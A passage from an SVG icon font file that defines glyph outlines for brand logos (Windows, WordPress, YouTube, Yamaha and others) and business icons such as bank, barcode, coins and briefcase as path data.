64-3-1-3-3-4-5z m32-55c4 7 11 8 18 4 6-3 9-10 13-16-5 3-10 6-15 9-3 2-7 2-10 0-4-3-2-6 1-8 2-2 3-3 0-5-2-1-5 0-6 1-5 5-4 10-1 15z m11-20c11-2 2-10 3-15-8 7-9 7-19-1-1 13 6 17 16 16z m3-24c21 2 16-7 13-18-2-6-2-12-4-20-6 3-12 5-17 8-5 2-17-4-15 8 2 19 8 20 23 22z m-42 104l0 0 0 0h-1l1 0z m843-49c-10-4-20-10-29-17-8-6-21-11-22-22-3-23-1-46 14-66 6-8 11-7 16 0 7 9 14 18 23 25 9 9 16 7 20-5 5-12 9-25 7-38-1-18-4-22-21-25-21-2-25-7-25-27 0-5 0-10 0-15h-2c1-9 1-17 2-26 2-17 6-19 19-9 14 11 27 22 41 32 7 5 15 15 23 10 7-6 2-17 0-25-2-8 0-11 8-10 12 2 29 23 24 34-9 20 0 36 8 52 4 6 7 12 8 20 2 56-15 108-34 159-1 4-3 8-9 6-15-7-23-37-12-50 4-4 9-8 6-15-5-14-12-27-28-32-12-5-18 0-19 13 0 6 1 12 1 18 0 13-7 18-19 13z m93-93c-8 18-10 37-13 55 8-17 12-35 13-55z m-41 26c0 1 1 2 2 3 6 5 10 15 18 8 8-6 4-15-3-21l-1-1c-3-7-8-12-15-7-8 4-4 11-1 18z m25-13c-10-10-2-22-4-35-5 21-14 16-25 4l-2 5c11 9 21 17 31 26z m-7 18c-2 2-4 2-6 1-6-3-9-7-9-13 0-15 8-4 13-4l1 1c0 5 6 10 1 15z m-581-225c-5-1-11 0-10-10 2-8 6-10 13-9 6 1 12 2 17 2 6 1 10 2 8 9-1 5-1 11-9 10-6-1-13-1-19-2z m-3 19c-5 0-11 1-10-7 0-9 6-8 11-8 6 1 12 3 19 3 5 0 6 3 6 7 0 6-3 8-8 7-6 0-12-1-18-2z m-3 5c4 0 6 0 8 1 6 1 17-2 17 8-1 12-12 4-19 6-1 1-4 0-5 0-5-3-14 1-12-9 1-9 8-6 11-6z m-296 187c6-3 11-6 18-9 2 18-3 24-16 21-3-1-5-3-6-6-1-4 1-5 4-6z" />
<glyph glyph-name="brand-windows" horiz-adv-x="1000" unicode="&#xe959;" d="M2 708l407 56 0-393-407-2 0 339z m407-382l0-394-407 56v340l407-2z m49 445l540 79v-474l-540-4v399z m541-449l-1-472-540 76 0 397 541-1z" />
<glyph glyph-name="brand-wire" horiz-adv-x="1000" unicode="&#xe95a;" d="M502 3c-62-45-129-68-204-65-160 4-295 138-297 297-2 161 0 323-1 484 0 3 1 7 2 13h56v-27c0-151 0-302 0-453 1-126 82-227 204-251 69-13 135 1 193 42-16 28-35 52-45 79-13 37-25 77-26 116-3 133-2 267-2 400 1 72 51 125 117 125 66 0 118-54 118-124 1-97 1-194 0-290 0-54-1-107-6-160-6-53-32-100-66-143 33-28 71-42 111-47 143-16 257 70 281 211 3 17 3 34 3 52 0 146 0 293 0 440v30h59c0-9 1-16 1-24 0-150 0-300 0-450-1-156-94-277-242-313-77-19-170-6-256 58z m-3 84c37 43 57 92 58 147 1 135 1 270 1 404 0 39-22 64-57 65-35 1-61-25-61-63 0-133-1-266 1-398 0-57 19-109 58-155z" />
<glyph glyph-name="brand-wordpress" horiz-adv-x="1000" unicode="&#xe95b;" d="M498 788c-238 0-435-196-435-436 0-241 202-440 440-440 239 0 435 201 435 441 0 241-201 435-440 435z m-362-574s-57 145 8 299l186-512c0 0-126 51-194 213z m255-236l116 341 121-335c0 0-115-48-237-6z m163 560s21 0 38 2c0 0 25-2 20 23 0 0-2 12-28 8 0 0-74-6-180 0 0 0-34 7-32-15 0 0-6-20 57-18l59-168-85-257-141 423s44 2 49 6c0 0 14 4 8 22 0 0-1 10-35 7l-109-2s101 174 326 177c0 0 147 5 263-104 0 0-82 4-68-89 0 0 3-23 32-66 0 0 34-58 32-83 0 0 12-52-23-143l-42-143-141 420z m142-524l126 370c34 79 20 156 20 156 90-170 23-326 23-326-54-139-169-200-169-200z" />
<glyph glyph-name="brand-xiaomi" horiz-adv-x="1000" unicode="&#xe95c;" d="M63 788v-876h875v876h-875z m394-660c0-3-3-6-5-6h-99c-3 0-5 3-5 6v267c0 3 2 5 5 5h99c2 0 5-2 5-5v-267z m198 0c0-3-3-6-5-6h-97c-3 0-6 3-6 6v282c0 40-32 72-72 72h-211c-3 0-6-2-6-5v-349c0-3-2-6-5-6h-98c-3 0-5 3-5 6v445c0 2 2 5 5 5h369c72 0 131-59 131-132v-318z m195 0c0-3-2-6-5-6h-99c-3 0-5 3-5 6v445c0 2 2 5 5 5h99c3 0 5-3 5-5v-445z" />
<glyph glyph-name="brand-yahoobuzz" horiz-adv-x="1000" unicode="&#xe95d;" d="M500-150c-184 0-333 149-333 333v667h190v-667c0-78 64-143 143-143s143 65 143 143c0 79-64 143-143 143h-95v191h95c184 0 333-150 333-334s-149-333-333-333z" />
<glyph glyph-name="brand-yamaha" horiz-adv-x="1000" unicode="&#xe95e;" d="M807 225c-2 0-5 0-8-1-7-3-15-1-24 1-8 1-15 4-21 10-6 6-10 14-12 23-3 15-8 30-17 43-9 13-22 23-35 31l-34 19 187 108-21 35-206-119-38 21v43l207 119-21 36-186-107v38c0 16-2 32-9 46-6 14-17 26-29 37-7 5-12 13-14 22-2 8-1 15 2 23 2 8 5 17 11 21 3 1 4 4 5 6 1 3 1 6 0 9l-36 133c-1 2-2 3-3 4-2 1-3 2-5 2s-4-1-5-2c-2-1-3-2-3-4l-36-133c-1-3-2-6-1-9 1-2 2-5 5-6 6-4 9-13 12-21 2-8 3-15 1-23-2-9-7-17-14-22-12-10-22-23-29-37-7-15-9-30-9-46v-38l-186 107-21-35 208-119v-44l-38-21-206 120-20-36 186-108-33-19c-14-8-26-17-35-30-9-13-15-29-18-44-1-8-5-16-11-23-7-6-13-9-22-10-8-1-17-4-24 0-2 0-5 1-8 0-3 0-5-1-7-4l-97-98c-1-2-2-4-2-5 0-2 0-3 1-5 1-1 2-3 4-4 1-1 3-1 5 0l134 35c2 1 5 2 7 4 2 2 2 5 3 7 0 8 7 15 12 21 6 7 12 11 20 13 9 2 18 2 26-1 14-5 31-8 46-7 16 2 30 8 44 16l33 19v-215h42v239l37 21 37-21v-239h42v215l33-19c14-8 28-14 44-16 15-1 32 2 46 7 8 3 18 3 26 1 8-2 14-6 19-13 6-6 12-13 13-20 0-3 1-5 3-7 2-2 4-4 7-5l134-35c1 0 3 0 5 1 1 1 3 2 4 3 1 2 1 4 1 5-1 2-1 4-2 5l-97 98c-3 2-6 4-9 4z m-385 38l-60-35c-9-4-19-6-29-3-9 2-18 9-22 17-5 9-7 19-4 28 2 10 9 18 17 23l60 35 38-21v-44z m115 67l-36-22-38 22v43l38 22 36-21v-44z m0 133l-37-21-37 22v69c0 10 3 20 11 27 7 7 16 11 26 11s19-4 27-11c7-7 10-17 10-27v-70z m153-221c-5-9-14-15-23-17-10-3-20-2-28 3l-61 35v43l38 22 60-35c8-5 14-13 17-23 3-9 2-20-3-28z m-190 603c-273 0-495-222-495-495 0-273 222-495 495-495 273 0 495 222 495 495 0 273-222 495-495 495z m416-718c2-2 3-5 4-8 0-3-1-6-2-9-2-2-4-4-7-5-3-2-5-2-9-1h0l-59 15c-74-110-200-183-343-183-143 0-269 73-344 183l-58-16h-1c-3 0-6 0-9 2-2 1-5 3-6 5-2 3-2 6-2 9 0 3 1 6 3 8l42 43c-25 55-39 116-39 180 0 219 169 398 384 414l16 59v1c1 3 3 5 6 7 2 2 5 2 8 2 3 0 6-1 8-2 2-2 4-4 6-7l16-60c215-16 385-195 385-414 0-64-15-125-42-180l43-43z" />
<glyph glyph-name="brand-youtube" horiz-adv-x="1000" unicode="&#xe95f;" d="M817 373h-634c-101 0-183-82-183-183v-146c0-101 82-183 183-183h634c101 0 183 82 183 183v146c0 101-82 183-183 183z m-501-114h-59v-293h-57v293h-59v50h175v-50z m167-293h-51v27c-9-10-19-18-29-23-10-6-20-8-29-8-12 0-21 4-27 11-6 8-9 19-9 34v212h51v-194c0-6 1-11 3-13 2-3 6-4 10-4 4 0 9 1 14 5 6 4 11 8 16 14v192h51v-253z m183 52c0-18-4-32-12-41-8-10-19-15-34-15-10 0-19 2-26 6-8 4-16 9-22 17v-19h-51v343h51v-111c7 8 14 14 22 18 7 4 15 6 23 6 16 0 28-5 37-16 8-11 12-27 12-48v-140z m176 68h-97v-48c0-13 2-22 5-27 3-5 9-8 17-8 8 0 14 2 18 7 3 4 5 14 5 28v12h52v-13c0-26-7-46-19-59-13-13-32-19-57-19-23 0-41 7-54 21-13 13-19 33-19 57v114c0 22 7 39 21 53s33 21 56 21c23 0 41-6 53-19 13-13 19-31 19-55l0-65z m-74 95c-9 0-14-3-18-7-3-5-5-12-5-23v-26h45v26c0 11-2 18-6 23-3 4-9 7-16 7z m-175 1c-4 0-7-1-11-3-3-2-7-4-10-8v-157c4-4 8-8 12-9s8-3 12-3c6 0 11 2 14 5 3 4 4 10 4 18v131c0 8-2 15-5 19-4 4-9 7-16 7z m-327 279h64v157l75 221h-66l-39-151h-4l-42 151h-65l77-228 0-150z m225-7c26 0 47 7 62 20 14 14 22 33 22 56v144c0 22-8 39-23 53-15 13-34 20-58 20-26 0-46-7-62-19-15-13-23-30-23-52v-145c0-23 8-42 23-56s35-21 59-21z m-23 224c0 6 2 11 6 15 5 4 10 6 17 6 8 0 14-2 19-6 4-4 7-9 7-15v-152c0-7-3-13-7-17-5-4-11-7-19-7-7 0-13 2-17 7-4 4-6 10-6 17l0 152z m192-221c11 0 22 3 33 9 12 6 23 15 33 26v-31h57v279h-57v-212c-5-6-11-11-17-15-7-4-12-6-16-6-5 0-9 2-12 5-2 3-3 8-3 14v214h-57v-233c0-17 3-29 10-37 6-9 16-13 29-13z" />
<glyph glyph-name="brand-zain" horiz-adv-x="1000" unicode="&#xe960;" d="M230 669c89 58 222 108 296 130 39 12 40 53 25 51-85-11-166-52-234-102-31-23-61-48-87-78-2-1-3-3 0-1z m598-549l0 0c-18-22-37-44-57-64l-3-4c-4-4-7-7-11-11l-5-4c-3-4-6-7-10-10-1-2-3-3-5-5-4-3-8-7-12-10l-2-3h-1c-18-16-36-31-54-44-73-53-156-100-245-110-416-50-380 321-380 321 3-21 8-41 13-60h0c27-94 71-170 144-190 0 0-2 1-4 3l-1 0c0 0-1 1-2 1l-1 0c0 1-1 1-2 2l-1 1c-1 0-2 1-3 1l-1 1c-1 1-3 2-4 2l0 1c-2 1-3 2-5 3l-1 1c-1 1-2 2-3 3l-2 1-3 3-2 1-3 4-1 1c-2 1-3 3-5 5l-1 0c-1 2-2 3-4 5l-1 2c-1 1-2 2-3 4 0 0-1 1-1 2l-3 4-1 2c-1 2-3 4-4 6l0 1c87-73 210-70 295-54 124 24 237 117 238 121 0 0 0 0-1 0-24-16-54-32-79-44-116-58-269-88-379 0-83 67-124 188-121 295 1 52 10 114 30 162-1-15-17-163 32-272 6-12 12-23 18-34l0-1c2-3 4-6 6-9 1-1 2-3 2-4l4-5c1-2 2-3 3-5l3-4 3-5c2-1 3-3 4-5 1-1 2-2 3-4 3-3 5-5 7-8l2-1c2-3 4-5 6-7 1-1 2-2 3-3 2-2 4-4 6-6 0 0 1-1 2-2 2-2 4-4 7-6l1-1c3-3 6-5 10-7l0-1c3-2 6-4 9-6l3-2c2-1 5-3 7-4 1-1 1-1 2-1 3-2 6-3 8-5l3-1c3-2 7-3 10-5 64-27 160-20 226-4 44 11 87 27 128 46 35 17 70 38 102 61 22 15 44 33 64 53-20-34-45-65-45-65 24 20 160 139 160 289h-1c2 64-29 126-73 165-105 94-263 85-375 17-66-40-117-109-131-186-1 23 1 43 2 55-23-55-36-211 99-272 59-30 135-27 195 1 45 21 94 69 124 109 34 45 58 102 45 157-1 4-2 7-3 10 0 1 0 1 0 2l-1 0c0 3-1 6-2 8-1 1-1 2-2 2-20 45-66 69-114 74-70 8-150-21-185-87-37-68-9-136 57-154-33-22-96-25-128 8-56 59-15 160 34 207 73 72 196 94 285 47 119-64 115-188 55-298-17-30-39-58-64-83l0 0c-3-4-7-8-11-11l0-1c-8-7-16-14-24-20l-1-1c-9-6-17-12-26-18l-1 0c-4-3-8-6-13-8l0-1c-4-2-9-5-14-7l0 0c-4-3-9-5-13-7-1 0-1 0-2-1-9-4-18-7-27-11-1 0-2 0-3-1-4-1-8-3-13-4l0 0c-5-1-10-3-14-4-1 0-2 0-3-1-4 0-8-1-12-2-1 0-2 0-3 0-4-1-9-2-13-3-1 0-2 0-3 0-4 0-8-1-12-1-1 0-2 0-3 0-5 0-10 0-14 0-5 0-11 0-16 0l-4 0c-4 0-7 1-11 1l-4 1c-5 0-9 1-14 2l-2 0c-4 1-8 1-12 2-1 1-3 1-5 1l-8 3c-2 0-4 0-5 1-4 1-8 2-12 4l-1 0-1 1-1 0c-120 44-178 170-149 300 14 64 50 127 95 172 48 47 111 83 174 102 120 37 257 22 347-72 135-142 62-336-19-460-11-17-23-33-36-50z m-30 380l0-1 0 1z" />
<glyph glyph-name="bank-alt" horiz-adv-x="1000" unicode="&#xe961;" d="M929 26h-858c-5 0-8-4-8-8v-58c0-5 3-8 8-8h859c4 0 8 3 8 8v58c0 4-4 8-9 8z m-47 547c5 0 7 1 5 2-1 1-2 1-3 1-124 56-248 112-372 169-11 4-19 4-30-1-94-44-190-87-285-130-26-12-52-24-78-36-4-2-7-4-7-4 0-1 4-1 8-1h762z m-382 124c21 0 38-17 38-38 0-20-17-37-37-37-21-1-38 17-39 37 0 21 17 38 38 38z m-226-565c5 0 8 3 8 8v317c0 5-3 8-8 8h-91c-5 0-8-3-8-8v-317c0-5 3-8 8-8h91z m182-1c5 0 8 4 8 8v318c0 5-3 8-8 8h-91c-5 0-8-3-8-8v-318c0-4 3-8 8-8h91z m365 1c4 0 8 3 8 8v318c0 4-4 8-8 8h-92c-4 0-8-4-8-8v-318c0-5 4-8 8-8h92z m-183 0c5 0 8 3 8 8v318c0 4-3 8-8 8h-91c-5 0-8-4-8-8v-318c0-5 3-8 8-8h91z m-522 364h769c4 0 8 3 8 8v23c0 4-4 8-8 8h-769c-4 0-8-4-8-8v-23c0-5 4-8 8-8z m-8-402v-24c0-4 4-8 8-8h769c5 0 8 4 8 8v27c0 3-4 5-8 5h-769c-4 0-8-4-8-8z" />
<glyph glyph-name="bank" horiz-adv-x="1000" unicode="&#xe962;" d="M94 474h812s23 19 0 43l-406 239-406-239s-28-26 0-43z m839-497l-49 43c-3 2-9 4-14 4l-730-1c-5 0-11-2-14-4l-58-42c-3-2-5-6-5-9v-19c0-2 4-5 9-5h857c5 0 9 3 9 5v19c0 3-3 7-5 9z m-129 464h75v-375h-75v375z m-122 0h74v-375h-74v375z m-427 0h75v-375h-75v375z m-122 0h75v-375h-75v375z m369-374c5 0 11 1 16 2v46c24 5 41 15 54 30 12 14 18 32 18 54 0 13-2 23-5 32s-7 15-13 21c-6 6-13 11-21 15-8 5-17 9-27 13l-23 10c-4 1-8 3-12 5-4 2-7 4-10 6-4 3-6 6-8 9-2 4-3 9-3 14 0 6 2 11 4 14 2 4 5 7 9 9 4 2 8 4 12 4 5 1 9 1 14 1 7 0 14 0 19-1 6 0 11-1 16-2s9-3 13-4c4-2 8-3 12-5 6 15 11 30 12 45-11 4-21 6-30 9-10 2-20 3-31 4v40c-6 2-11 3-17 3-5 0-11-1-17-3v-41c-23-3-41-11-55-25-13-13-20-32-20-55 0-11 2-21 4-28 3-8 7-14 12-20 5-6 11-10 18-14s15-8 24-12l21-9c4-2 9-4 13-6 5-2 9-4 13-7 4-2 7-6 9-10 3-4 4-9 4-15 0-13-4-22-13-27-9-6-22-9-39-9-11 0-21 1-31 3-9 1-20 5-30 9-3-8-6-16-8-24-2-8-3-15-4-23 6-3 13-5 19-7 6-2 12-3 18-4 6-1 12-2 19-3 7 0 15-1 23-1h3v-41c6-1 12-2 18-2z" />
<glyph glyph-name="barcode" horiz-adv-x="1000" unicode="&#xe963;" d="M128 728h-60c-3 0-5-3-5-6v-744c0-3 2-6 5-6h60c3 0 6 3 6 6v744c0 3-3 6-6 6z m659 0h-59c-4 0-6-3-6-6v-744c0-3 2-6 6-6h59c4 0 6 3 6 6v744c0 3-2 6-6 6z m-359 0h-60c-3 0-5-3-5-6v-744c0-3 2-6 5-6h60c3 0 6 3 6 6v744c0 3-3 6-6 6z m195 0h-36c-4 0-6-3-6-6v-744c0-3 2-6 6-6h36c3 0 6 3 6 6v744c0 3-3 6-6 6z m-86 0h-24c-3 0-6-3-6-6v-744c0-3 3-6 6-6h24c3 0 6 3 6 6v744c-1 3-3 6-6 6z m-262 0h-31c-4 0-6-3-6-6v-744c0-3 2-6 6-6h31c3 0 6 3 6 6v744c0 3-3 6-6 6z m-64 0h-24c-3 0-6-3-6-6v-744c0-3 3-6 6-6h24c3 0 6 3 6 6v744c0 3-3 6-6 6z m721 0h-31c-4 0-6-3-6-6v-744c0-3 2-6 6-6h31c3 0 6 3 6 6v744c0 3-3 6-6 6z m-64 0h-24c-3 0-6-3-6-6v-744c0-3 3-6 6-6h24c3 0 6 3 6 6v744c0 3-3 6-6 6z" />
<glyph glyph-name="bill-alt" horiz-adv-x="1000" unicode="&#xe964;" d="M500 525c75 0 136-79 136-175s-61-175-136-175c-75 0-136 79-136 175s61 175 136 175z m-437-424h875v498h-875v-498z m157 49c0 67-54 122-122 122v156c68 0 122 55 122 122h560c0-67 54-122 122-122v-156c-68 0-122-55-122-122l-560 0z" />
<glyph glyph-name="billboard" horiz-adv-x="1000" unicode="&#xe965;" d="M929 181c5 0 9 4 9 9v486c0 5-4 9-9 9h-137v18c0 5-4 9-9 9h-20c-5 0-9-4-9-9v-18h-508v18c0 5-4 9-9 9h-20c-5 0-9-4-9-9v-18h-136c-5 0-9-4-9-9v-486c0-5 4-9 9-9h136v-34h-139c-4 0-6-3-6-6v-11c0-3 2-6 6-6h139v-127c0-5 4-9 9-9h20c5 0 9 4 9 9v127h508v-127c0-5 4-9 9-9h20c5 0 9 4 9 9v127h139c4 0 6 3 6 6v11c0 3-2 6-6 6h-139v34l137 0z m-175-34h-508v34h508v-34z m-650 62c-5 0-9 4-9 9v430c0 5 4 9 9 9h792c5 0 9-4 9-9v-430c0-5-4-9-9-9l-792 0z m760 423h-728c-7 0-13-6-13-14v-371c0-7 6-13 13-13h728c7 0 13 6 13 13v371c0 8-6 14-13 14z" />
<glyph glyph-name="briefcase-1" horiz-adv-x="1000" unicode="&#xe966;" d="M496 289c43 0 70-24 90-83 113 14 216 46 309 112 30 22 46 45 42 85-4 34-1 70-1 105 0 87-57 145-145 147-33 1-66-1-98 1-10 1-25 9-28 17-25 68-75 96-145 95-23 0-46 1-68-1-60-3-102-33-122-88-7-20-16-24-34-24-31 1-61 1-92 0-83-2-140-61-141-143 0-47-1-94 0-140 1-12 4-27 11-33 96-83 210-118 332-133 21 59 47 82 90 83z m-39 410c48-2 103 19 142-42h-202c10 31 33 44 60 42z m389-501c0-41-6-81-11-122-5-45-36-76-81-76-170-1-339-1-509 0-45 0-76 31-81 75-5 46-8 91-14 136-1 12-11 25-20 34-14 11-31 19-51 31 4-59 8-111 12-163 2-18 4-36 6-54 8-65 67-125 133-125 180-3 359-2 539-1 64 1 125 59 132 123 9 73 14 147 20 225-15-9-25-18-38-23-27-11-37-30-37-60z m-393-6c-1-43 11-61 41-62 30-1 45 16 45 55 1 39-15 61-43 61-26 0-43-21-43-54z" />
<glyph glyph-name="briefcase-2" horiz-adv-x="1000" unicode="&#xe967;" d="M634 711h-267c-25 0-46-21-46-46v-65h64v37c0 8 7 14 15 14h201c8 0 14-6 14-14v-37h64v65c0 25-20 46-45 46z m-571-668c0-29 24-53 53-53h768c30 0 53 24 53 53v323h-875v-323z m821 515h-768c-29 0-53-24-53-54v-89h875v89c0 30-24 54-54 54z" />
<glyph glyph-name="businessman" horiz-adv-x="1000" unicode="&#xe968;" d="M500 350c106 0 191 98 191 219s-85 219-191 219c-106 0-191-98-191-219s85-219 191-219z m-105 278c13-34 55-59 105-59s137 6 137-28c0-75-61-136-137-136s-137 61-137 136c0 34 13 64 32 87z m433-497c0 91-73 164-164 164h-125l12-11c6-6 6-16 0-22l-26-24c-7-6-10-17-6-24l50-123c3-7 2-19-3-25l-57-85c-5-7-13-7-17 0l-58 85c-5 6-6 18-3 25l50 123c4 7 1 18-6 24l-26 24c-6 6-6 16 0 22l12 11h-125c-91 0-164-73-164-164v-164c0-30 24-55 55-55h546c31 0 55 25 55 55v164z" />
<glyph glyph-name="businesswoman" horiz-adv-x="1000" unicode="&#xe969;" d="M330 390h170c-62 0-113 51-113 114v46c0 6 5 11 10 11 103 7 103 113 103 113s0-106 103-113c6 0 11-5 11-11v-46c0-63-51-114-114-114h171c24 0 44 15 53 36 4 11-6 21-17 25-21 8-36 29-36 53v113c0 94-77 171-171 171-94 0-170-77-170-171v-113c0-24-15-45-36-53-11-4-21-14-17-25 8-21 29-36 53-36z m341-80h-93c-11 0-14-7-6-15l27-27c8-8 10-23 3-32l-90-136c-6-9-17-9-23 0l-90 136c-7 9-5 24 3 32l27 27c8 8 5 15-6 15h-93c-63 0-113-51-113-114v-227c0-31 25-57 56-57h454c32 0 57 26 57 57v227c0 63-51 114-113 114z" />
<glyph glyph-name="chair" horiz-adv-x="1000" unicode="&#xe96a;" d="M248-55c0-18-14-33-32-33s-32 15-32 33c0 18 15 33 32 33s32-15 32-33z m283 0c0-18-14-33-31-33s-32 15-32 33c0 18 14 33 32 33 17 0 31-15 31-33z m284 0c0-18-14-33-31-33s-32 15-32 33c0 18 14 33 32 33s31-15 31-33z m-9 514h-78c-11 0-20-10-20-21 0-12 9-21 20-21h19v-102c-10-4-27-12-51-19l-14 14c-9 10-22 14-35 12 0 0-41-7-107-9v36c73 5 110 21 115 24 16 7 25 24 24 42l-31 319c-2 15-11 28-25 34-4 2-46 19-123 19-77 0-119-17-123-19-14-6-23-19-25-34l-31-319c-1-18 8-35 24-42 5-3 42-19 115-24v-36c-66 2-107 9-107 9-13 2-26-2-35-12l-14-14c-24 7-41 15-51 19v102h19c11 0 20 9 20 21 0 11-9 21-20 21h-78c-11 0-20-10-20-21 0-12 9-21 20-21h19v-115c0-7 4-14 10-18 1-1 20-12 55-24-2-8-1-18 2-26 6-15 21-26 37-26h143v-23c0-15 8-29 20-36v-71c-169-4-271-54-276-57-7-3-11-10-11-18v-6c0-4 10-6 22-6h0c13 0 32 3 44 7 42 15 119 35 221 38v-23s9-22 20-22c11 0 20 10 20 22v23c101-3 178-23 220-38 12-4 32-7 44-7h0c13 0 23 2 23 6v6c0 8-5 15-12 18-4 3-107 53-275 57v71c12 7 20 21 20 36v23h143c22 0 40 19 40 42 0 4 0 7-1 10 35 12 53 23 55 24 6 4 10 11 10 19v114h19c11 0 20 9 20 21 0 11-9 21-20 21z" />
<glyph glyph-name="coins" horiz-adv-x="1000" unicode="&#xe96b;" d="M598 497c0 148-120 268-268 268s-267-120-267-268 120-267 267-267 268 120 268 267z m-459 0c0 106 86 191 191 191s191-85 191-191c0-105-85-191-191-191s-191 86-191 191z m202-146v22c52 3 87 27 87 73 0 54-41 67-87 77v66c39-1 39-38 61-38 12 0 22 8 22 22 0 34-56 51-83 52v18c0 6-4 12-10 12-6 0-10-6-10-12v-18c-44-2-83-26-83-74 0-38 31-61 83-70v-73c-58 3-28 51-67 51-13 0-21-8-21-22 0-28 29-63 88-64v-22c0-6 4-12 10-12 6 0 10 6 10 12z m0 126c19-4 43-11 43-35 0-23-22-32-43-34v69z m-21 50c-26 5-39 15-39 33 0 15 16 28 39 29v-62z m563-69h-239c-5-39-17-76-36-109h275c30 0 55 24 55 54 0 30-25 55-55 55z m0-138h-292c-33-47-78-85-131-109h423c30 0 54 24 54 55 1 30-24 54-54 54z m0 275h-250c9-29 14-61 14-94 0-5 0-10 0-15h236c30 0 54 25 54 55 1 30-24 54-54 54z m0-412h-570c-31 0-55-25-55-55 0-30 24-55 55-55h570c30 0 55 25 55 55 0 30-25 55-55 55z m0-138h-570c-31 0-55-25-55-55 0-30 24-54 55-54h570c30 0 55 24 55 54 0 30-25 55-55 55z m0 579c30 0 55 24 55 54s-25 55-55 55h-337c32-31 59-68 76-109h261z" />
<glyph glyph-name="company" horiz-adv-x="1000" unicode="&#xe96c;" d="M504 654c32 0 59 30 59 67s-27 67-59 67-58-30-58-67 26-67 58-67z m-32 85c4-11 17-18 32-18 15 0 42 1 42-9 0-23-19-41-42-41-23 0-42 18-42 41 0 11 4 20 10 27z m-51-219h167c9 0 16 8 16 17v50c0 28-22 50-50 50h-38l4-3c2-2 2-5 0-7l-8-7c-2-2-3-6-2-8l15-37c1-3 1-6-1-8l-17-26c-2-2-4-2-5 0l-18 26c-1 2-2 6-1 8l16 37c1 3 0 6-2 8l-8 7c-2 2-2 5 0 7l3 3h-38c-27 0-50-22-50-50v-50c0-9 7-17 17-17z m25-407c0-37 26-67 58-67s58 30 58 67c0 37-26 67-58 67-32 0-58-30-58-67z m100-8c0-23-19-42-42-42-23 0-42 19-42 42 0 10 4 19 10 26 4-10 17-18 32-18 15 0 42 2 42-8z m8-75h-38l4-4c2-2 2-5 0-7l-8-7c-2-2-3-5-2-7l15-38c1-2 1-6-1-8l-17-26c-2-2-4-2-5 0l-18 26c-1 2-2 6-1 8l16 38c1 2 0 5-2 7l-8 7c-2 2-2 5 0 7l3 3h-38c-27 0-50-22-50-50v-50c0-9 7-17 17-17h167c9 0 17 8 17 17v50c-1 28-23 51-51 51z m214 83c0-37 26-67 59-67s58 30 58 67c0 37-26 67-58 67-33 0-59-30-59-67z m100-8c0-23-18-42-41-42-23 0-42 19-42 42 0 10 4 19 10 26 4-10 16-18 32-18 15 0 41 2 41-8z m9-75h-39l4-4c2-2 2-5 0-7l-8-7c-2-2-3-5-2-7l16-38c1-2 0-6-1-8l-18-26c-1-2-3-2-5 0l-17 26c-2 2-2 6-1 8l15 38c1 2 0 5-2 7l-8 7c-2 2-2 5 0 7l4 4h-39c-27 0-50-23-50-51v-50c0-9 8-16 17-16h167c9 0 17 7 17 16v50c0 28-23 51-50 51z m-704 16c32 0 58 30 58 67 0 37-26 67-58 67s-59-30-59-67c0-37 27-67 59-67z m-32 85c4-10 17-18 32-18 15 0 42 2 42-8 0-23-19-42-42-42-23 0-42 19-42 42 0 10 4 19 10 26z m82-101h-38l3-4c2-2 2-5 0-7l-8-7c-1-2-2-5-1-7l15-38c1-2 1-6-1-8l-18-26c-1-2-3-2-5 0l-17 26c-2 2-2 6-1 8l15 38c1 2 0 5-2 7l-8 8c-2 1-2 4 0 6l4 4h-38c-28 0-50-23-50-51v-50c0-9 7-16 16-16h167c10 0 17 7 17 16v50c0 28-22 51-50 51z m-48 197c12 0 22 10 22 22v88h285v-88c0-12 10-22 22-22 12 0 22 10 22 22v88h285v-88c0-12 10-22 22-22s22 10 22 22v110c0 12-10 22-22 22h-307v66c0 12-10 21-22 21s-22-9-22-21v-66h-307c-12 0-22-10-22-22v-110c0-12 10-22 22-22z" />
<glyph glyph-name="contact-add" horiz-adv-x="1000" unicode="&#xe96d;" d="M134 88c-14 0-26 12-26 27v523c0 15 12 27 26 27h640c14 0 26-12 26-27v-239c16-2 31-6 46-12v289c0 14-12 26-27 26h-730c-15 0-26-12-26-26v-599c0-14 11-26 26-26h479c-7 12-13 24-18 37h-416z m165 245h-20c-41 0-75-33-75-75v-21c0-13 11-24 24-24h252c13 0 23 11 23 24v21c0 42-33 75-75 75h-20c-10 0-18 9-18 19 0 4 2 7 4 10 12 11 21 26 28 42 2-2 3-2 5-2 10 0 23 24 23 41 0 16-1 29-12 29-1 0-3 0-4 0-1 44-12 100-80 100-71 0-80-55-80-100-1 0-2 0-3 0-11 0-13-13-13-29 0-17 13-41 24-41 1 0 3 0 4 1 7-16 16-30 27-41 3-3 4-6 4-10 0-10-8-19-18-19z m381 190c0 9-8 18-18 18h-211c6-14 11-31 12-51 5-3 8-7 11-13h188c10 0 18 8 18 18v28z m-2-151c1 2 2 5 2 7v28c0 10-8 18-18 18h-184c-5-19-17-39-34-44l-1-3v-16h213c7 3 14 7 22 10z m-125-125c9 23 21 44 37 63h-71c9-15 15-33 15-52v-11h19v0z m332 55c-31 31-73 51-120 52h-6c-50 0-94-20-126-52-32-32-53-77-53-126 0-25 6-49 15-71 9-21 22-40 38-56 32-32 76-52 126-52 99 0 179 80 179 179 0 49-20 94-53 126z m-41-152h-59v-59h-52v59h-58v52h58v58h52v-58h59v-52z" />
<glyph glyph-name="files-stack" horiz-adv-x="1000" unicode="&#xe96e;" d="M756 358l6 34c2 13-6 23-18 23h-485c-12 0-20-10-18-23l6-34c2-12 12-21 23-21h463c11 0 22 9 23 21z m-37-81h-435c-11 0-18-8-16-19l4-29c2-10 11-18 22-18h416c10 0 20 8 21 18l5 29c1 11-6 19-17 19z m207-115c-8 9-18 14-30 14h-792c-11 0-22-5-29-14-8-8-11-20-9-31l31-219h806l32 219c1 11-2 23-9 31z m-758 39l-41 273c0 34 27 61 61 61h622c34 0 61-27 61-61l-37-270h55l36 270c0 64-51 116-115 116h-622c-64 0-116-52-116-116l41-273h55z m36 432h568l10 43c1 4 0 9-3 12-3 3-7 6-12 6h-559c-4 0-8-2-11-6-3-4-4-8-3-13l10-42z m56 94h456l8 43c0 5-1 9-4 12-2 4-6 6-11 6h-443c-4 0-8-2-11-6-3-3-4-8-3-12l8-43z" />
